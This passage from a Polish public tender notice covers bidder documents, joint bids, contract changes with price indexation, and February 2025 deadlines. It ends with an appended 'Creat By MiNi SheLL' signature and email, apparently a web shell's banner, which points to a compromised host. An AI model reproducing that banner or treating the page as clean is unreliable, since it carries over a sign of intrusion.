podstawie art. 109 ust. 1 pkt 4 ustawy Prawo zamówień publicznych.<br/>1) Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast<br/>dokumentów, o których mowa w Rozdziale 3 ust. 6.2 SWZ, składa dokument lub dokumenty wystawione w kraju, w którym<br/>Wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że nie otwarto jego likwidacji ani nie<br/>ogłoszono upadłości.<br/>2) Dokumenty, o których mowa w pkt. 1) powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu<br/>składania ofert.<br/>3) Jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce zamieszkania ma osoba, której dokument dotyczy, nie wydaje się dokumentów, o których mowa w pkt. 1), zastępuje się je dokumentem zawierającym<br/>odpowiednio oświadczenie Wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego reprezentacji, lub<br/>oświadczenie osoby, której dokument miał dotyczyć, złożone przed notariuszem lub przed organem sądowym,<br/>administracyjnym albo organem samorządu zawodowego lub gospodarczego właściwym ze względu na siedzibę lub<br/>miejsce zamieszkania wykonawcy lub miejsce zamieszkania tej osoby. Przepis pkt. 2) stosuje się odpowiednio. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 4.1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.<br/>4.2. W przypadku, o którym mowa w pkt. 4.1 Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w<br/>postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia<br/>publicznego. W związku z tym składają pełnomocnictwo do reprezentowania ich w postępowaniu o udzielenie zamówienia<br/>albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego dla ustanowionego przez nich<br/>pełnomocnika.<br/>4.3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ponoszą solidarną odpowiedzialność za wykonanie<br/>umowy <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> zmiany umowy mogą dotyczyć:<br/>1) wynagrodzenia, i warunków płatności<br/>2) zmiany Regulaminu ochrony osób i mienia.<br/>2. Zmiany, o których mowa w ust. 1 pkt. 1 mogą nastąpić w przypadku:<br/>1) zmiany obowiązującej stawki podatku od towarów i usług ,<br/>2) wzrostu minimalnego wynagrodzenia za pracę albo wysokości minimalnej stawki godzinowej, ustalonych na podstawie<br/>ustawy z dnia 10 października 2002 roku o minimalnym wynagrodzeniu za pracę;<br/>3) w przypadku zmiany zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości<br/>stawki składki na ubezpieczenie społeczne lub zdrowotne,<br/>4) zmiany zasad gromadzenia i wysokości wpłat do pracowniczych planów kapitałowych, jeżeli zmiany te będą miały wpływ<br/>na koszty wykonania zamówienia przez wykonawcę i zostaną przez niego udokumentowane<br/>- jeżeli zmiany te będą miały wpływ na koszty wykonania zamówienia przez WYKONAWCĘ.<br/>3. W razie zmiany, o której mowa ust. 2 pkt 1 wynagrodzenie umowne netto nie ulegnie zmianie, a jedynie zostanie do niego<br/>doliczony podatek w zmienionej wysokości.<br/>Strony przewidują zmiany wysokości wynagrodzenia Wykonawcy w przypadku zmiany cen materiałów lub kosztów<br/>związanych z realizacją zamówienia, przy czym:<br/>1) wynagrodzenie będzie waloryzowane o wskaźnik cen towarów i usług konsumpcyjnych (kwartał do poprzedniego<br/>kwartału) ogłaszany w komunikacie Prezesa Głównego Urzędu Statystycznego,<br/>2) każda ze Stron Umowy jest uprawniona do żądania zmiany wysokości wynagrodzenia,<br/>3) Strona może wystąpić z wnioskiem o pierwszą waloryzację po 6 miesiącach od podpisania Umowy oraz przy wzroście<br/>lub obniżeniu Wskaźnika waloryzacji określonego powyżej, o co najmniej 2% za ostatni kwartał poprzedzający złożenie<br/>wniosku o waloryzację; w przypadku wzrostu lub obniżenia Wskaźnika waloryzacji waloryzacja będzie polegała odpowiednio<br/>na wzroście lub obniżeniu wynagrodzenia za usługi realizowane po dniu złożenia wniosku o wartość procentową Wskaźnika<br/>waloryzacji,<br/>4) Strona może wystąpić z wnioskiem o każdą kolejną waloryzację nie wcześniej niż po upływie 6 miesięcy od poprzedniej<br/>waloryzacji oraz przy wzroście lub obniżeniu Wskaźnika waloryzacji, o co najmniej 2%, obliczonego na podstawie średniej<br/>Wskaźników waloryzacji za 2 ostatnie kwartały poprzedzające złożenie wniosku o waloryzację; w przypadku wzrostu lub<br/>obniżenia Wskaźnika waloryzacji waloryzacja będzie polegała odpowiednio na wzroście lub obniżeniu wynagrodzenia za<br/>usługi realizowane po dniu złożenia wniosku o Wskaźnik waloryzacji obliczony na podstawie średniej Wskaźników<br/>waloryzacji za 2 ostatnie kwartały poprzedzające złożenie wniosku o waloryzację,<br/>5) waloryzacja nie dotyczy usług zrealizowanych przed datą złożenia wniosku przez którąkolwiek ze Stron,<br/>6) maksymalna wartość zmiany wynagrodzenia brutto, jaką dopuszcza Zamawiający w efekcie zastosowania niniejszych<br/>postanowień, nie może przekroczyć 10% wynagrodzenia brutto Wykonawcy, ustalonego w dniu zawarcia Umowy <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-02-20 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://ezamowienia.gov.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-02-20 10:10</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-03-21</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com